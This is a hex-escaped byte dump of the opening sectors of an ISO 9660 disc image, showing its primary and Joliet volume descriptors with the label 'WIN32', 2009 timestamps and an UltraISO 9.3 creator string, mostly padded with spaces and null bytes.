"\x0F\xB9\xB0\xF1\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xED\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\xD6\xCD\x0E\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\xF5\xF8\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1E\x6F\x7D\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x92\xD6\x14\x4E\xE5\xCA\x63\x52\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\xF2\x65\x79\xC2\x8B\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x22\x27\xD6\xF9\x89\xE3\x7D\x3D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1F\x90\x81\xC1\x9E\x12". - "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x16\x01\x01\x43\x44\x30\x30\x31\x01\x00\x57\x49\x4E\x33\x32\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x32\x30\x30\x39\x30\x34\x30\x32". - "\x5F\x30\x33\x31\x34\x30\x34\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x00\x00\x00\x00\x00\x00\x00\x00". - "\x22\x00\x00\x00\x00\x00\x00\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x01\x00\x00\x01\x00\x08\x08\x00\x32\x00\x00\x00\x00\x00\x00\x32\x13\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x22\x00\x17\x00\x00\x00\x00\x00\x00\x17\x00\x08\x00\x00\x00\x00\x08\x00\x00\x00". - "\x00\x00\x00\x00\x00\x02\x00\x00\x01\x00\x00\x01\x01\x00\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". 
- "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x55\x4C\x54\x52\x41\x49\x53\x4F\x20\x56\x39\x2E\x33\x20\x43\x44\x20\x26". - "\x20\x44\x56\x44\x20\x43\x52\x45\x41\x54\x4F\x52\x2C\x20\x28\x43\x29\x32\x30\x30\x39\x20\x45\x5A\x42\x20\x53\x59\x53\x54\x45\x4D". - "\x53\x2C\x20\x49\x4E\x43\x2E\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". 
- "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x32\x30\x30". - "\x39\x30\x34\x30\x32\x30\x33\x31\x35\x30\x36\x30\x30\xE0\x32\x30\x30\x39\x30\x34\x30\x32\x30\x33\x31\x35\x30\x36\x30\x30\xE0\x30". - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x00\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30". - "\x00\x01\x00\x55\x4C\x54\x52\x41\x49\x53\x4F\x00\x39\x2E\x33\x2E\x33\x2E\x32\x36\x38\x35\x00\xC8\x14\x05\x00\x00\x00\x00\x00\x1F". - "\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x2F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x3E\x7B\x7C\x00\x00\x00\x00\x00\x00\x00\x00\x23\x35\xB6\x8E". 
- "\x2E\xA5\x97\x35\x54\x4F\x6E\xCA\x98\xF7\xB9\x7D\xA6\xC3\xBE\x27\xB4\xEF\xE4\x53\xA0\x4D\xC6\x52\xDA\xD2\x2B\x9E\xC0\xAC\xFD\x55". - "\xEA\x74\x42\x74\x38\x0E\x5F\xB0\x7C\x70\xD7\x0D\x8B\xB3\xA3\xDE\x2E\x12\xFC\xAA\x40\xD5\xA7\xFF\xA9\xDF\x3C\xE2\xFE\xA4\xAF\x87". - "\x8A\x0C\xF9\x37\x65\x37\xA8\x07\x42\x8A\x8E\x38\x8E\x0E\x2B\x86\xB2\x8D\x61\x62\xF1\xCB\x78\x86\xEF\x05\x5C\x2D\x56\xE8\xEF\x9C". - "\xDE\x7E\xC0\xA9\xCC\x36\xD6\x86\xA7\x17\xC5\x2E\x95\x2B\xB6\xCF\x37\x9C\xA7\xDF\x92\x75\xF3\x7A\x50\x7A\x2B\x01\x4C\xB4\x66\x64". - "\xFE\xE4\xB3\x92\xB3\xFC\x62\x33\xDA\x94\x62\xC7\x90\x1F\x9A\xEE\x79\xB7\xBA\xE2\xFE\xDC\xC9\x44\xC8\x54\x6C\x2F\x8A\x29\xAD\xA2". - "\xBE\x0E\xBE\x5A\x6D\xC5\xA0\xD6\x2A\xE3\x26\x21\xA8\x2A\x8B\xD9\xDD\x40\xE6\x77\x5C\xFB\xE0\x04\x61\xE6\xBC\xAD\x03\x4E\x5D\x2A". - "\x5B\x58\x2B\x6C\xFC\x8F\xE7\x9B\x43\x44\xD3\xD5\x5C\x4B\x65\x46\x6A\x62\x31\x13\x3E\xD3\x4A\x8E\xB1\x1B\x77\x5D\x09\xC9\x37\xFC". - "\x01\xBA\xA2\x73\x97\xCB\xE2\x71\xA7\x70\x9A\x7F\xA5\x92\xB8\xA2\x0D\xEB\x72\xB1\x9C\x86\x1F\x6C\x38\x4E\x3F\x14\x5A\x84\x87\x88". - "\x5E\x93\x73\x49\x87\xEF\xF2\x26\x09\x94\xD9\xB1\xB0\x6E\xD6\xC7\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x17\x01". - "\x02\x43\x44\x30\x30\x31\x01\x00\x00\x57\x00\x69\x00\x6E\x00\x33\x00\x32\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x32\x00\x30\x00\x30\x00\x39\x00\x30\x00\x34\x00\x30\x00\x32\x00\x5F\x00\x30\x00\x33\x00\x31". - "\x00\x34\x00\x30\x00\x34\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x22\x00\x00\x00\x00\x00\x00\x22\x25\x2F\x45\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x01\x00\x00\x01". - "\x00\x08\x08\x00\x3A\x00\x00\x00\x00\x00\x00\x3A\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x00\x00\x00\x22\x00\x1C\x00". 
- "\x00\x00\x00\x00\x00\x1C\x00\x08\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x01\x00\x00\x01\x01\x00\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x55". - "\x00\x6C\x00\x74\x00\x72\x00\x61\x00\x49\x00\x53\x00\x4F\x00\x20\x00\x56\x00\x39\x00\x2E\x00\x33\x00\x20\x00\x43\x00\x44\x00\x20". 
- "\x00\x26\x00\x20\x00\x44\x00\x56\x00\x44\x00\x20\x00\x43\x00\x72\x00\x65\x00\x61\x00\x74\x00\x6F\x00\x72\x00\x2C\x00\x20\x00\x28". - "\x00\x63\x00\x29\x00\x32\x00\x30\x00\x30\x00\x39\x00\x20\x00\x45\x00\x5A\x00\x42\x00\x20\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65". - "\x00\x6D\x00\x73\x00\x2C\x00\x20\x00\x49\x00\x6E\x00\x63\x00\x2E\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00". - "\x20\x00\x20\x00\x20\x00\x20\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20". - "\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x20\x32\x30\x30\x39\x30\x34\x30\x32\x30\x33\x31\x35\x30\x36\x30\x30\xE0\x32\x30". - "\x30\x39\x30\x34\x30\x32\x30\x33\x31\x35\x30\x36\x30\x30\xE0\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x00". - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x00\x01\x00\x55\x4C\x54\x52\x41\x49\x53\x4F\x00\x39\x2E\x33\x2E". - "\x33\x2E\x32\x36\x38\x35\x00\xC8\x14\x05\x00\x00\x00\x00\x00\x1F\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". 
- "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". - "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
